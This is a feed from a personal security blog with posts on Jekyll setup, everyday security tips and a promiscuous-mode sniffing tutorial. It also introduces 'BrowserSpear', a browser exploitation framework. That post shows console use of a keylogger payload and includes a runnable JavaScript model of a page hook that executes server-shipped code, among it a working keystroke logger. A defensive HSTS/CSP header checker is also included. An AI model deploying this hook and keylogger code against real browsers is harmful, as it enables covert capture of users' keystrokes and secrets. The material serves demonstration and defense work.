<p>lvlrt: personal site of Lars Veelaert (https://lvlrt.github.io/). Feed generated by Jekyll, 2021-09-07T10:19:46+00:00.</p>
<h1>How to build a site with Jekyll and Github Pages</h1>
<p>Lars Veelaert, 2018-01-08. https://lvlrt.github.io/2018/01/08/how-to-build-a-site-with-jekyll-and-github-pages</p>
<p><img src="/assets/jekyll_pages.jpg" alt="Jekyll and Pages Logo" /></p>
<p><em>As a terminal guy, I never really liked the way Content Management Systems for websites work. Sure, they provide great UX (mostly) for the average user. But what if I want to skip all that and just make a barebones site that I can manage with the applications I already have on my system?</em></p>
<p>Welcome to the realm of static site generators. <em>Awesome… So if I want to change something I have to write HTML and CSS myself?</em> No. That is a possibility if you want a static page for your company or just a landing page, but I wanted a blog, so using something like <a href="https://jekyllrb.com/">Jekyll</a> in combination with <a href="https://pages.github.com/">Github Pages</a> is the more logical choice. Let’s walk through how to set it up.</p>
<h2>How it works</h2>
<p><a href="https://pages.github.com/">Github Pages</a> supports <a href="https://jekyllrb.com/">Jekyll</a>, a static site generator. This means there is no backend, database or hosting to configure: GitHub builds the site from the repo and serves the resulting static files. To add content you write Markdown, which makes it easy to write good-looking articles without touching HTML and CSS.</p>
<p>You can have a <a href="https://pages.github.com/">Github Pages</a> site for every repo (private or public) and one extra per user. Without a custom domain, your website URL will be <code class="language-plaintext highlighter-rouge">https://&lt;user&gt;.github.io/&lt;repo&gt;</code>. You do have to enable the feature in the repo settings before anything gets hosted. Keep in mind that the published site is reachable by anyone, even when the repo itself is private, so never commit secrets or private notes into a Pages repo.</p>
<h2>Creating the repo</h2>
<p>To define the contents of your personal page, you have to create a repo whose name exactly matches the format <code class="language-plaintext highlighter-rouge">&lt;user&gt;.github.io</code>. In my case this is <code class="language-plaintext highlighter-rouge">larsveelaert.github.io</code>. Normal project pages can have any name.</p>
<p>Now go to your new or existing repo, hit <em>Settings</em> and scroll down to the Github Pages section. Under <em>Source</em>, choose the branch that holds your files, and that is all you have to do for the hosting of your site. Easy, right?</p>
<h2>Search a theme</h2>
<p>Now get your Google skills on and search for “<em>Jekyll themes</em>”. Often you will find GitHub repos with a demo link. If you like one, continue…</p>
<p>The easiest way to use that theme is to clone its repo and copy all of its contents into your own repo. Remember that a theme is third-party code: its JavaScript runs in every visitor’s browser and any plugins listed in its Gemfile run on your machine when you build locally, so skim what you copy. For example, with the <em><a href="https://github.com/yous/whiteglass">Whiteglass</a></em> theme do:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git clone https://github.com/yous/whiteglass.git
cp -R whiteglass/* larsveelaert.github.io/
</code></pre></div></div>
<p>You will have to set two settings to the right value before the site will work, namely <em>baseurl</em> and <em>url</em>. Both live in <code class="language-plaintext highlighter-rouge">_config.yml</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>baseurl: "" # the subpath of your site, e.g. /blog
url: "https://larsveelaert.github.io" # the base hostname & protocol for your site, e.g. http://example.com
</code></pre></div></div>
<p>Now push your changes to your site’s repo and you have successfully copied the theme:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git add --all          # also stages the new, untracked theme files
git commit -a -m 'theme setup'
git push
</code></pre></div></div>
<p>After a brief waiting period, browse to your website and you should see your chosen theme presented.</p>
<h2>Making changes and adding content</h2>
<p>The great thing about this approach is that we can run <a href="https://jekyllrb.com/">Jekyll</a> ourselves locally, so we do not depend on one centralized way of changing content.
Make sure <em><a href="https://www.ruby-lang.org/en/">Ruby</a></em> is installed and run the following commands in your repo:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gem install jekyll bundler
bundle install          # installs the gems pinned in the theme's Gemfile
bundle exec jekyll serve
</code></pre></div></div>
<p>Your site is now served on <code class="language-plaintext highlighter-rouge">localhost:4000</code>. If you want it to rebuild the site whenever a file changes, add the <code class="language-plaintext highlighter-rouge">--watch</code> option (recent Jekyll versions enable it by default for <code class="language-plaintext highlighter-rouge">serve</code>). This is a great option when writing and previewing an article.</p>
<p>The main settings like the page title and social links are set in the <code class="language-plaintext highlighter-rouge">_config.yml</code> file of your repo. Every theme is a bit different, but go through the docs of your specific theme and you will find clean ways to change the navigation or add extra pages.</p>
<p>Your posts live in the <code class="language-plaintext highlighter-rouge">_posts</code> folder; create a new file there named <code class="language-plaintext highlighter-rouge">YYYY-MM-DD-title.md</code>, start it with a YAML front matter block (typically <code class="language-plaintext highlighter-rouge">layout</code> and <code class="language-plaintext highlighter-rouge">title</code>) and write your article in <a href="https://nl.wikipedia.org/wiki/Markdown">Markdown</a>. A great resource to learn the basics of Markdown is <a href="https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet">this Github page</a>.</p>
<h2>TIP: --drafts</h2>
<p>Something that is really useful is a <code class="language-plaintext highlighter-rouge">_drafts</code> folder. Posts you put there (without a date in the filename) are not added to your regular feed. To process them and preview the result, add the <code class="language-plaintext highlighter-rouge">--drafts</code> switch to your local <code class="language-plaintext highlighter-rouge">jekyll</code> command and they will appear as the most recent blog posts. Note that the site not rendering them is the only thing hiding a draft: if you push the folder, anyone who can read the repo can read your drafts.</p>
<h2>TIP: --incremental</h2>
<p>When <code class="language-plaintext highlighter-rouge">--watch</code> is active, the whole site is rebuilt whenever a file changes. If you only want to rebuild the files that changed, use <code class="language-plaintext highlighter-rouge">--incremental</code>. Jekyll still flags this as experimental and it can miss pages that depend on the changed file, so do a full build before you push.</p>
<h2>Conclusion</h2>
<p>Using just a text editor and the infrastructure of Github Pages makes it really easy to push changes with all the advantages we know from <em><a href="https://git-scm.com/">Git</a></em>.
Being able to edit offline, keep offline backups of the complete source and really manage changes is a great option. Not having a backend to maintain is also a big win for security: there is no CMS, database or admin login to patch or to get compromised.</p>
<p>Have fun!</p>
<p>Lars Veelaert</p>
<h1>Introducing BrowserSpear, a Lightweight Browser Exploitation Framework for Embedded Devices</h1>
<p>Lars Veelaert, 2018-01-02. https://lvlrt.github.io/2018/01/02/Introducing-BrowserSpear,-A-Lightweight-Browser-Exploitation-Framework-For-Embedded-Devices</p>
<p><img src="/assets/intro_browserspear.jpg" alt="Intro Browserspear" /></p>
<p><em>With the rise of IoT devices and other cheap off-the-shelf development platforms there is an opportunity to optimize the toolsets of red teamers, penetration testers and ethical hackers. To take full advantage of these devices we need our frameworks to be light and flexible. In this article I want to present a tool I built called ‘BrowserSpear’. It consists of a basic framework to exploit browsers and runs on any architecture that can host a basic server. Feedback is always welcome.</em></p>
<p>When demonstrating the need for network security, there are few tools that really get the appropriate reaction and are easy enough to demo to a crowd of people without actually sending malicious code or using an exploit that might crash the device.</p>
<p>A great demo is to downgrade the traffic on a network from HTTPS to unencrypted HTTP. <a href="https://demgeeks.com/hackotg-v1-4-see-all-traffic-on-a-network">We can do this</a> with tools such as <a href="https://www.bettercap.org">Bettercap</a>, <a href="https://moxie.org/software/sslstrip/">SSLstrip</a> or another variant. After this downgrade it is possible to inject extra code into the plain HTTP responses to make the website’s background pink or pop up an alert: something very noticeable to a user that will get a reaction.</p>
<p>What takes this to the next level is browser exploitation. The very famous tool <a href="https://beefproject.com/">BeEF</a> (Browser Exploitation Framework Project) can control the complete page a target loaded over an insecure connection once an extra script is injected into it. That script ‘hooks’ the client and makes it receive commands from <a href="https://beefproject.com/">BeEF</a>.</p>
<h2>The issue</h2>
<p>Browser exploitation is nothing new and BeEF is a well-known tool, but it is a bit older and needs a lot of extra dependencies. Here is where the use of old libraries like libv8 and specific Ruby gems starts to become an issue, which makes it almost impossible to install on architectures like ARM.</p>
<p>Many auditing devices built on a mobile architecture such as ARM have surfaced, such as the <a href="https://www.wifipineapple.com/">WiFi Pineapple</a>, <a href="https://www.hak5.org/gear/packet-squirrel">Packet Squirrel</a> and even <a href="https://null-byte.wonderhowto.com/how-to/rooted-android-your-new-pentesting-tool-0159093">your own rooted Android smartphone</a>. These compact tools make a great portable and reliable platform. Using them on the go, or for example a Raspberry Pi as a low-powered server in the cloud, is an excellent use of these new and cheaper devices to audit networks and demonstrate attack vectors.</p>
<h2>So what is BrowserSpear?</h2>
<blockquote>
<p>Browserspear is a lightweight framework built on the <a href="https://nodejs.org/en/">NodeJS</a> engine. The complete core and modules are written in JavaScript and adding payloads is as simple as writing an extra function and saving it in the ‘modules’ folder.</p>
</blockquote>
<p>Any device with the server capacity to run NodeJS can act as a server to ‘spear’ browsers, and the complete behavior of the server can be controlled from a shell prompt or scripted beforehand.</p>
<p>BrowserSpear is still under development, but can be found in <a href="https://github.com/larsveelaert/browserspear">this Github repo</a>. The core functionalities like code delivery and hooking or ‘spearing’ targets are fully working.</p>
<h2>How to get started</h2>
<p>With NodeJS and NPM installed (through your favourite package manager), clone the Github repo and install the following packages:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git clone https://github.com/larsveelaert/browserspear.git
npm install websockets prompt uglify-js commander
</code></pre></div></div>
<p>Starting a console session is as simple as running the script. <code class="language-plaintext highlighter-rouge">--help</code> will give you all the extra info you need for advanced configuration.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ node browserspear.js --help
Usage: browserspear [options]
Options:
-V, --version output the version number
-c, --commandfile <file> file with commands to run in the console
-p, --port <port> Port to listen on
-i, --ip <ip> The ip address to use in the reverse connection
-s, --start Start a listener immediatly
-h, --help output usage information
</code></pre></div></div>
<p>In the BrowserSpear console you can get a list of available commands by typing ‘help’. Here is an extract:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>>>> help
Available commands:
- start | restart
Restarts the server that serves the spear and provides the socket to connect to
- set <property> <value>
Sets a value used by the server or module. ex. 'set LHOST: mydomain.org'
- options
List all the values of the options.
- load <module>
Loads the functions inside that module. Only one module can be selected at once. ex. 'load keylogger'
- modules <search>
Gives a list of all available modules, with an optional searchterm.
- exec
Executes the 'exec' function of the current selected module. Ex. send a payload
- conns
List all connections to the server
- help
Print this help.
</code></pre></div></div>
<p>The default address of the spear is <code class="language-plaintext highlighter-rouge">localhost:1337</code>. Navigating to this address on the local device running the server (started with <code class="language-plaintext highlighter-rouge">start</code>) gives you the following output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>>>> start
>>> Tue Jan 02 2018 14:11:14 GMT+0000 (UTC) Server is listening on port 1337
New connection to client at ::1
>>> conns
List of connections:
[0] ::1
</code></pre></div></div>
<p>Now we can load a module, for example a keylogger: an attack that logs all keystrokes in that browser. By default the payload is sent to all connected clients. The client then records the keystrokes and sends them to the server. The attack stays active even if the server is restarted or the module is unloaded, because the injected code keeps running inside the page once it is delivered.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>>>> load keylogger
>>> keylogger: exec
Payload sent
>>> keylogger:
[::1] KEYLOGGER:I will now tell you all my secrets
</code></pre></div></div>
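<p>To make the hook-and-module mechanism concrete, here is an added example that is not BrowserSpear’s own code: a small model, in plain Node JavaScript, of a hook injected into a page, a server that ships a keylogger module to it, and the reason the payload keeps reporting after a server restart. The in-memory socket pair standing in for the WebSocket, the <code class="language-plaintext highlighter-rouge">fakeDocument()</code> standing in for the DOM, the module text and the <code class="language-plaintext highlighter-rouge">demo()</code> scenario are all assumptions made for this example; BrowserSpear’s real module format and transport are not shown here.</p>

```javascript
'use strict';
// Added example, not BrowserSpear's code: a minimal model of a browser hook,
// a command server that ships a keylogger module, and why the payload keeps
// reporting after the server restarts. Assumptions: an in-memory socket pair
// replaces the WebSocket and fakeDocument() replaces the DOM, so this runs in Node.

// ---- server side: a module is code shipped as text and run inside the page ----
const MODULES = {
  // Illustrative module text; BrowserSpear's real module format may differ.
  keylogger: `
    var buf = [];
    document.addEventListener('keydown', function (e) {
      buf.push(e.key);
      // Report in batches of 8 keys instead of one message per keystroke.
      if (buf.length >= 8) { send('KEYLOGGER:' + buf.join('')); buf = []; }
    });
  `,
};

function createServer() {
  const server = { conns: [], reports: [] };
  // A hook connected: keep its socket and record everything it reports back.
  server.accept = (sock, remote) => {
    sock.onmessage = (msg) => server.reports.push({ remote, msg });
    server.conns.push({ sock, remote });
  };
  // 'exec': deliver the selected module's code to every connected hook.
  server.exec = (name) => {
    if (!MODULES[name]) throw new Error('unknown module: ' + name);
    const frame = JSON.stringify({ module: name, code: MODULES[name] });
    for (const c of server.conns) c.sock.send(frame);
  };
  // 'restart': drop every connection. Listeners already installed in pages survive.
  server.restart = () => {
    for (const c of server.conns) c.sock.close();
    server.conns = [];
  };
  return server;
}

// ---- transport: an in-memory socket pair (assumption, stands in for WebSocket) ----
function socketPair() {
  const a = { open: true };
  const b = { open: true };
  a.send = (m) => { if (b.onmessage) b.onmessage(m); };
  b.send = (m) => { if (a.onmessage) a.onmessage(m); };
  a.close = () => { a.open = false; b.open = false; if (b.onclose) b.onclose(); };
  b.close = () => { a.open = false; b.open = false; if (a.onclose) a.onclose(); };
  return [a, b];
}

// ---- browser side: the hook injected into the page ----
function createHook(document, remote) {
  const hook = { sock: null, outbox: [] };
  // Payloads call send(); while disconnected, reports are queued, not lost.
  const send = (text) => {
    if (hook.sock && hook.sock.open) hook.sock.send(text);
    else hook.outbox.push(text);
  };
  hook.connect = (server) => {
    const [clientSide, serverSide] = socketPair();
    hook.sock = clientSide;
    // Each received frame is module code; run it with `document` and `send` in scope.
    clientSide.onmessage = (raw) => {
      const { code } = JSON.parse(raw);
      new Function('document', 'send', code)(document, send);
    };
    clientSide.onclose = () => { hook.sock = null; };
    server.accept(serverSide, remote);
    while (hook.outbox.length) clientSide.send(hook.outbox.shift());
  };
  return hook;
}

// ---- a stand-in DOM: records listeners and lets us synthesise keystrokes ----
function fakeDocument() {
  const listeners = {};
  return {
    addEventListener: (type, fn) => { (listeners[type] = listeners[type] || []).push(fn); },
    type: (text) => {
      for (const ch of text) for (const fn of listeners.keydown || []) fn({ key: ch });
    },
  };
}

// The scenario from the post: hook, exec the keylogger, type, restart the server, type again.
function demo() {
  const server = createServer();
  const doc = fakeDocument();
  const hook = createHook(doc, '::1');
  hook.connect(server);
  server.exec('keylogger');
  doc.type('password');   // 8 keys: one batch reaches the server
  const before = server.reports.length;
  server.restart();       // server gone, but the keydown listener is still in the page
  doc.type('secret12');   // batch is queued in the hook's outbox
  hook.connect(server);   // reconnect: queued report is flushed
  const last = server.reports[server.reports.length - 1];
  return { before, after: server.reports.length, lastRemote: last.remote, lastMsg: last.msg };
}

if (typeof require !== 'undefined' && require.main === module) console.log(demo());
```

<p>The point to take from <code class="language-plaintext highlighter-rouge">demo()</code> is the second half: once <code class="language-plaintext highlighter-rouge">exec</code> has delivered the module, the server can disappear and the listener still sits in the page, buffering until a hook reconnects. Closing the tab is the only thing that removes it, which is why the module does not need to be “unloaded” on the client for the attack to continue.</p>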
<p>That’s it for the basic usage. As you have control over the full webpage, there is no limit on what you can do within the constraints of JavaScript. There are already known attacks to get persistence on the full domain, cross-domain and even cross-browser.</p>
<p>Looking ahead to <a href="https://developers.google.com/web/progressive-web-apps/">Progressive Web Applications</a>, there is a need to mitigate this attack vector properly, because the native APIs already available in the browser are quite powerful and can easily be used against the user (HTML5 webcam, microphone, GPS, contacts, file access, …). The ever smaller gap between online and offline will create a need for strong security analysis so that system access can be strictly controlled.</p>
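<p>As an added example that is not part of the post, the following Node script checks the two response headers that defeat the downgrade-and-inject chain described above: <code class="language-plaintext highlighter-rouge">Strict-Transport-Security</code>, which makes a browser that has already seen the site over HTTPS refuse plain HTTP on later visits (the very first visit is only covered by the browsers’ preload list), and <code class="language-plaintext highlighter-rouge">Content-Security-Policy</code>, whose <code class="language-plaintext highlighter-rouge">script-src</code> decides whether an injected inline hook, or a hook loaded from the attacker’s host, may run at all. The header names and directives are the real ones; the two header sets, the attacker origin and the nonce value are constructed for the demo, and the CSP parser is deliberately simplified (no <code class="language-plaintext highlighter-rouge">'strict-dynamic'</code>, no path matching, no report-only policies).</p>

```javascript
'use strict';
// Added example, not from the post or BrowserSpear: assess whether a page's
// response headers stop the HTTPS-downgrade-and-inject demo. Simplified on
// purpose: no 'strict-dynamic', no path matching, no report-only policies.

// Parse a Content-Security-Policy value into { directive: [source, ...] }.
function parseCsp(value) {
  const policy = {};
  for (const part of value.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) policy[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return policy;
}

// Sources governing <script>: script-src, falling back to default-src.
function scriptSources(policy) {
  return policy['script-src'] || policy['default-src'] || null;
}

const hasKeyword = (src, kw) => src.some((s) => s.toLowerCase() === kw);

// Does the policy block an inline <script> injected into the HTML?
// Inline scripts only run with 'unsafe-inline', and a nonce or hash in the
// same directive makes browsers ignore 'unsafe-inline' (CSP Level 2+).
function blocksInlineScript(policy) {
  const src = scriptSources(policy);
  if (!src) return false;                       // no policy: anything runs
  const nonceOrHash = src.some((s) => /^'(nonce-|sha(256|384|512)-)/i.test(s));
  return !hasKeyword(src, "'unsafe-inline'") || nonceOrHash;
}

// Does the policy block a hook script fetched from `origin` (e.g. the attacker's host)?
function blocksExternalScript(policy, origin) {
  const src = scriptSources(policy);
  if (!src) return false;
  const url = new URL(origin);
  const allowed = src.some((s) => {
    const t = s.toLowerCase();
    if (t === '*' || t === url.protocol) return true;    // any host, or any host on this scheme
    if (t === url.origin || t === url.host) return true;  // exact host match
    if (t.startsWith('*.')) return url.hostname.endsWith(t.slice(1));
    return false;
  });
  return !allowed;
}

// Parse Strict-Transport-Security: max-age, includeSubDomains, preload.
function parseHsts(value) {
  const hsts = { maxAge: 0, includeSubDomains: false, preload: false };
  for (const part of value.split(';')) {
    const [k, v] = part.trim().split('=');
    const key = k.toLowerCase();
    if (key === 'max-age') hsts.maxAge = parseInt(v, 10) || 0;
    else if (key === 'includesubdomains') hsts.includeSubDomains = true;
    else if (key === 'preload') hsts.preload = true;
  }
  return hsts;
}

// Anything under a year is treated as too weak; the preload list also requires a year.
const ONE_YEAR = 365 * 24 * 3600;

// Assess one response's headers against an attacker origin.
function assess(headers, attackerOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v; // header names are case-insensitive
  const hsts = h['strict-transport-security'] ? parseHsts(h['strict-transport-security']) : null;
  const csp = h['content-security-policy'] ? parseCsp(h['content-security-policy']) : {};
  const strong = !!hsts && hsts.maxAge >= ONE_YEAR && hsts.includeSubDomains;
  return {
    // Returning visitors refuse plain HTTP for the whole domain tree; the first
    // visit is only covered when the site is on the browsers' preload list.
    hstsProtectsReturningVisitors: strong,
    hstsPreloadEligible: strong && hsts.preload,
    cspBlocksInlineHook: blocksInlineScript(csp),
    cspBlocksRemoteHook: blocksExternalScript(csp, attackerOrigin),
  };
}

// Constructed sample header sets (not captured from any real site).
const WEAK_HEADERS = { 'Content-Type': 'text/html' };
const HARDENED_HEADERS = {
  'Content-Type': 'text/html',
  'Strict-Transport-Security': 'max-age=63072000; includeSubDomains; preload',
  // The nonce must be random per response; it is fixed here only because this is sample data.
  'Content-Security-Policy': "default-src 'self'; script-src 'self' 'nonce-Zm9vYmFy'; object-src 'none'; base-uri 'self'",
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log('weak    ', assess(WEAK_HEADERS, 'http://attacker.example'));
  console.log('hardened', assess(HARDENED_HEADERS, 'http://attacker.example'));
}
```

<p>Run it against a real site by pasting that site’s headers into <code class="language-plaintext highlighter-rouge">assess()</code>. Note what HSTS does not do: it cannot help a visitor who has never reached the site over HTTPS, and it is only sent over HTTPS, so a site that is stripped on the first visit never gets to set it; that is exactly the gap the preload list closes.</p>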
<h2>Goals and Roadmap</h2>
<p>BrowserSpear will keep expanding its capabilities, aiming at more connection types (including obfuscation/evasion) and pre-configured payloads to make the complete framework very easy to use and very ‘hackable’.</p>
<p>As it is an open-source project, development will happen through <a href="https://github.com/larsveelaert/browserspear">its Github page</a>. Please feel free to contact me for more info, give feedback or even help develop the project to its full potential.</p>
<p>Happy spearing!</p>
<p>Lars Veelaert</p>
<h1>11 Tips to protect yourself from being hacked</h1>
<p>Lars Veelaert, 2017-12-13. https://lvlrt.github.io/2017/12/13/11-Tips-To-Protect-Yourself-From-Being-Hacked</p>
<p><img src="/assets/11_tips_hacked.jpg" alt="Intro 11 tips hacked" /></p>
<p><em>We all live online and have complete digital lives. Chatting, working, living and buying online means that we need to get the right data to the right person. First, let’s start with which data is so important to us and so desired by nefarious actors in the digital world.</em></p>
<p>If you say ‘I have nothing to hide’, you’re very much mistaken. We all regularly use our payment info online, and if somebody could file your taxes instead of you by stealing your identity, that would be a problem. We all want to keep our privacy, but if the devices we use can be turned into tools to spy on us, that is a problem too…</p>
<blockquote>
<p>If you say ‘I have nothing to hide’, you’re very much mistaken.</p>
</blockquote>
<p>But how can you protect yourself against attacks that try to gather your data or invade your privacy? A lot of data is stored with the companies we entrust it to, and if data leaks from their servers there is little we can do. But very often we are the weakest link ourselves. These 11 tips give you a list of things you can do to raise your personal protection level.</p>
<p>Definitions of some terms used in the article:</p>
<ul>
<li><a href="https://en.wikipedia.org/wiki/Malware">Malware</a>: <em>the software an attacker wants to get onto your system to control or monitor it.</em></li>
<li><a href="https://en.wikipedia.org/wiki/Exploit_(computer_security)">Exploit</a>: <em>the attack developed to use a weakness to gain access or make software do unintended things.</em></li>
</ul>
<h2>1. Reboot your device every day</h2>
<p>Apart from being the greatest tip in IT support history, it also has some real upsides from a security standpoint: updated software gets restarted and your temporary memory is emptied.</p>
<p>That last one is interesting. If you trigger malware on your system (open a nefarious file, click a wrong URL), it starts its life in temporary memory. In many cases, especially on smartphones, it takes another vulnerability to make the ‘hack’ persistent across reboots.</p>
<p>So a good habit is to reboot your laptop, smartphone, tablet, … once a day. It’s great for stability, performance and security.</p>
<h2>2. Disable features of your device</h2>
<p>Have you seen the post-its covering the webcam on a colleague’s laptop? This is a great tip. If somebody got unintended access to your device’s webcam, it would still be unusable.</p>
<p>You can continue this line of thinking: put a piece of tape over your microphone, and turn off WiFi, Bluetooth and GPS when you are not using them. It’ll not only save you some battery life, you’ll also limit the attack vectors and the data that can be used against you.</p>
<h2>3. Use a modern browser</h2>
<p>Use a modern browser like <a href="https://www.google.com/chrome/browser/desktop/index.html">Google Chrome</a> or <a href="https://www.mozilla.org/en-US/firefox/new">Firefox</a>. They update themselves and will protect you from scams and malicious content. If you work at a company and can’t install new software, ask the IT person which browser is configured on your machine. Internet Explorer 9 is not a good answer.</p>
<h2>4. Keep all your software up-to-date</h2>
<p>This is not an unexpected one: many vulnerabilities are patched in the most recent software, and most malware is older and is being reused by nefarious people against systems that never got the fix.</p>
<p>Actively look for updates of your operating system (OSX, Windows, iOS, Android, …) and for popular software such as Microsoft Office (Word, Excel, …) and your PDF reader (e.g. Acrobat Reader). The software packages mentioned above are the most widely used for injecting malware into your system. Most software auto-updates or asks permission to do so; if you are not sure, ask a tech-savvy person if it’s a good idea to click ‘Yes’.</p>
<h2>5. Install an ad blocker</h2>
<p>A great way to get fewer annoying screens that pop up trying to sell you something or tell you you have won something is to install a browser extension called an ‘ad blocker’. Malicious ads are also a common way to deliver exploits, so this is a security measure as well.</p>
<p>This is specific to the browser you use (mentioned before), so a quick Google search with the name of your browser and ‘ad blocker’ will point you in the right direction.</p>
<p>Harass your local IT guru if you need help or are in doubt about installing the right program.</p>
<h2>6. Use the incognito mode of your browser</h2>
<p>If you don’t want the site you are visiting to track you across sessions, or just don’t want these sites to show up in your history, use a feature built into most modern browsers called ‘Private’ or ‘Incognito’ mode. In this mode your browser does not keep cookies, cache or history once you close the window, and it runs without most of the extensions you installed. It does not hide your IP address or location from the sites you visit.</p>
<p>It will not make your device more secure, but it keeps your data and habits more private and keeps your searches from being autocompleted to something you don’t want to show up when you are at the office.</p>
<h2>7. Have a basic but good Antivirus</h2>
<p>This is a topic of a lot of discussion because antivirus is not a remedy for all problems. Antivirus will (among other things) check new files coming onto your system and search them for malicious content.</p>
<p>There are apps for your mobile devices that claim to do the same, but often don’t. They cannot check incoming files that are opened by other apps. These apps often give tips and assistance when browsing the web, but no actual protection.</p>
<p>Some operating systems, like Windows 10, have an antivirus built in, but it’s a good idea to complement it with another free option. And yes, contrary to popular belief, your Mac can be hacked.</p>
<h2>8. Diversify and protect your passwords</h2>
<p>This one is almost beaten to death, but it’s one of the most important ones.</p>
<p>Yes, one very strong password will be hard to crack. But if it is exposed in a data leak, all your services are exposed because you used the same password everywhere.</p>
<p>Having easier passwords that you can remember, but different ones per service, makes an individual password easier to crack, but at least the damage is contained.</p>
<p>The best approach combines the best of both: use a password manager to remember a different strong password for every service. A good password manager encrypts your passwords with one strong master password, and that is the only one you have to remember.</p>
<h2>9. Don’t open attachments from email addresses you don’t know</h2>
<p>A very common attack vector is an email with a malicious file attached. When you open it, the file tries to exploit outdated software on your system (typically your PDF reader or office suite, see tip 4). You will not notice anything: the document can be empty or can look like a perfectly legitimate document. The sender address is no guarantee either, since it can be forged or belong to a contact whose account was taken over.</p>
<p>So if you get such a suspicious email, just delete it or report it to the IT staff of your company.</p>
<h2>10. Don’t connect to open (unsecured) Wifi</h2>
<p>We are all desperate for free WiFi when we sit down at a local coffee shop or stay at a hotel. Many places will have a sign with the password, or the WiFi will just be openly accessible.</p>
<p>There are 2 problems with this. The first is while you are connected: every other device on that network can reach yours directly, with no router or firewall in between, and on an open network nothing is encrypted in the air. If your traffic is not protected by an extra layer (a VPN, or HTTPS for every site you use), it is visible to everybody else on that network and sometimes it is even possible to intercept and change it.</p>
<p>Secondly, your device keeps looking for the names of the networks it has saved, everywhere it goes. If a nefarious person sets up a hotspot with the same name, your device connects to it automatically without telling you, re-exposing you to the danger mentioned above.</p>
<p>Check your wireless settings for such networks saved to auto-reconnect and, if you find any, make your device forget them.</p>
<h2>11. Scan your pc regularly with an anti-malware scanner</h2>
<p>You often can’t prevent every piece of malware from getting onto your system, and if you did something in a rush and made a mistake you should be able to clean it up afterwards.</p>
<p>A great option is an anti-malware scanner, again a Google-search will give you a good option for your specific operating system. If you do this once a month and every time you think you’ve been exposed to malware you will have a very well maintained machine.</p>Lars VeelaertHackOTG (v1.4): See all traffic on a network with Promiscuous mode and Bettercap2017-10-31T00:00:00+00:002017-10-31T00:00:00+00:00https://lvlrt.github.io/2017/10/31/hackotg-v1-4-see-all-traffic-on-a-network<p><img src="/assets/header_hackotgv1_4.png" alt="Header" /></p>
<p><em>This article is part of a series: <a href="/2017/10/07/hackotg-v1-0-universal-portable-security-platform/">you can find the first article here</a>.
If you missed the previous one, <a href="/2017/10/11/hackotg-v1-3-creating-our-own-hotspot-on-boot/">it is here</a>.</em></p>
<h2>First, the basics</h2>
<p>Your network card (WiFi or ethernet) is your gateway to your network and the rest of the internet. The most common way to use it is to connect to an existing network, get an IP and done! But a network card can do many other things. A good example is that WiFi cards can set up a WiFi-hotspot themselves <a href="https://www.computerworld.com/article/2499772/mobile-wireless/mobile-wireless-wi-fi-tethering-101-use-a-smartphone-as-a-mobile-hotspot.html">(mobile phone tethering)</a>. We did this to the card of our HackOTG in <a href="https://larsveelaert.github.io/2017/10/11/hackotg-v1-3-creating-our-own-hotspot-on-boot/">one of the previous articles</a>.</p>
<p>In the normal ‘client’ (managed) mode, which is just being connected to an existing network, our network card only processes the frames addressed to its own MAC address (plus broadcast and multicast) and drops everything else. We can change this behaviour in 2 ways.</p>
<p>You can go into <a href="https://en.wikipedia.org/wiki/Monitor_mode">Monitor mode</a>, which means you see the raw 802.11 frames in the air, management frames included, without connecting (associating) with any WiFi access point. Think of it like listening to people’s conversations while you walk down the street: you hear everything, but whatever is encrypted (WPA2 data frames) stays encrypted.</p>
<p>There is also <a href="https://en.wikipedia.org/wiki/Promiscuous_mode">Promiscuous mode</a>, which makes the card hand every frame it receives to the operating system instead of only the ones addressed to it. In a wireless system you have to be within range of the transmitting device; in a wired Ethernet network the frame must physically reach your cable. On a switched network that rarely happens: the switch knows which MAC address sits on which port and only forwards a frame to that port, so in promiscuous mode you mostly see broadcast traffic plus your own.</p>
<p>Monitor mode is not commonly supported by consumer drivers because the general public does not use it. <em>Promiscuous mode</em> is almost universally available.</p>
<p>Without installing extra modules or changing drivers on our Raspberry Pi Zero, we can only do <em>promiscuous mode</em>, which is fine for what we want to do. Be aware that a driver listing “monitor” does not guarantee it works: the on-board chip of the Pi Zero W, for example, lists it but does not deliver frames in that mode without patched (nexmon) firmware. To see which modes your card claims to support, run:</p>
<pre>iw list</pre>
<p>Now in the output you will find a list of supported modes. You must know the physical-id (Phy#) of your device (not needed if you have only one).</p>
<pre class="output">[...]
Supported interface modes:
* IBSS
* managed
* AP
* AP/VLAN
* monitor
* P2P-client
* P2P-GO
* P2P-device
[...]</pre>
<h2>Watch your own traffic</h2>
<p>First, connect to a WiFi-hotspot with your HackOTG with the 2 scripts (connect_wifi_***.sh and route_wlan0.sh) we made in <a href="https://larsveelaert.github.io/2017/10/11/hackotg-v1-2-basic-connectivity-to-internet/">this article</a>.</p>
<p>If we now check the status of our network cards with the following command, the FLAGS column at the end tells us the mode: a “P” flag means promiscuous. As you can see there is none yet, because our card is still in normal (managed) mode. (netstat comes from the deprecated net-tools package; on systems without it, ip link show wlan0 lists PROMISC among the interface flags.)</p>
<pre>netstat -i</pre>
<pre class="output">Kernel Interface table
Iface MTU RX-OK RX-ERR RX-DRP RX-OVR TX-OK TX-ERR TX-DRP TX-OVR Flg
lo 65536 55 0 0 0 55 0 0 0 LRU
usb0 1500 2039 0 0 0 502 0 0 0 BMRU
wlan0 1500 2482 0 1 0 147 0 0 0 BMRU</pre>
<p>Let’s check what we can see going through our card right now by installing a tool called “tshark”, the terminal equivalent of Wireshark (a quite famous program).</p>
<pre>sudo apt-get install tshark</pre>
